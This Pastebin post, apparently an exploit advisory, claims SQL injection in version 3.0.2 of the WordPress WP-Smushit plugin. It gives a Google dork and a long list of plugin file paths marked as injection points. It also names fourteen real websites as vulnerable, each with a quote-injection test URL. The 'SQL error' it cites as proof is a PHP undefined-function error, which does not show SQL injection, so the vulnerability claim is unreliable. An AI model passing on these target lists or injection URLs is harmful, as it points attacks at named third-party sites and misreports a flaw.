Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : WordPress WP-Smushit Plugins 3.0.2 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 28/01/2019
- # Vendor Homepage : premium.wpmudev.org
- # Software Download Link : downloads.wordpress.org/plugin/wp-smushit.3.0.2.zip
- # Software Information Link : wordpress.org/plugins/wp-smushit/
- # Software Version : 3.0.2
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/wp-content/plugins/wp-smushit/''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- ####################################################################
- # Description about Software :
- **********************************
- WordPress WP-Smushit - Smush Image Compression and Optimization Plugin =>
- Smush has been benchmarked and tested number one for speed and quality and
- is the award-winning, back-to-back proven crowd favorite image optimization plugin for WordPress.
- Resize, optimize, optimise and compress all of your images with the
- incredibly powerful and 100% free WordPress image smusher,
- brought to you by the superteam at WPMU DEV!
- ####################################################################
- # Impact :
- **********
- * WordPress WP-Smushit Plugins 3.0.2 is prone to an
- SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied
- data before using it in an SQL query.
- * Exploiting this issue could allow an attacker to compromise the application, read,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- If the webserver is misconfigured, read & write access to the filesystem may be possible.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /wp-content/plugins/wp-smushit/app/class-wp-smush-dashboard.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/class-wp-smush-nextgen.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/meta-boxes/bulk-settings/meta-box.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/meta-boxes/bulk/meta-box-header.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/meta-boxes/bulk/meta-box.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/meta-boxes/cdn/meta-box-footer.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/meta-boxes/cdn/meta-box.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/meta-boxes/cdn/upsell-meta-box-header.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/meta-boxes/directory/meta-box.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/meta-boxes/integrations/meta-box.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/meta-boxes/nextgen/meta-box-header.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/meta-boxes/nextgen/meta-box.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/meta-boxes/nextgen/summary-meta-box.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/meta-boxes/pro-features/meta-box-header.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/meta-boxes/pro-features/meta-box.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/meta-boxes/settings/meta-box.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/meta-boxes/summary/meta-box.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/modals/directory-list.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/modals/quick-setup.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/smush-page.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/tabs.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/wp-smush-nextgen-bulk-page.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/core/external/free-dashboard/module.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/core/integrations/class-wp-smush-nextgen.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/core/integrations/class-wp-smush-gutenberg.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/core/integrations/class-wp-smush-s3.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/core/integrations/nextgen/class-wp-smush-nextgen-admin.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/core/integrations/nextgen/class-wp-smush-nextgen-stats.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/core/integrations/s3/class-wp-smush-s3-compat.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/core/modules/class-wp-smush-ajax.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/core/modules/class-wp-smush-async-editor.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/core/modules/class-wp-smush-backup.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/core/modules/class-wp-smush-cdn.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/core/modules/class-wp-smush-png2jpg.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/core/modules/class-wp-smush-resize.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/core/modules/class-wp-smushit.php?id=[SQL Injection]
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] brewurbancafe.com/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27
- [+] wegdermee.com/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27
- [+] ootb.net.au/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27
- [+] chefleticia.com/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27
- [+] bonofe.com/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27
- [+] kinetix365.com/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27
- [+] maquilalama.com/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27
- [+] tobaccoroadtours.com/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27
- [+] harpreetkumar.com/hindi/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27
- [+] 10minutos.com.bo/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27
- [+] akarcenter.com/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27
- [+] otherside-e.com/wp/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27
- [+] bowgrid.com/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27
- [+] sportschampic.com/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Fatal error: Uncaught Error: Call to undefined function esc_html__() in
- /home/brewurbancafe/public_html/wp-content/plugins/wp-smushit/app/views
- /blocks/progress-bar.php:17 Stack trace: #0 {main} thrown in /home
- /brewurbancafe/public_html/wp-content/plugins/wp-smushit/app/views
- /blocks/progress-bar.php on line 17
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment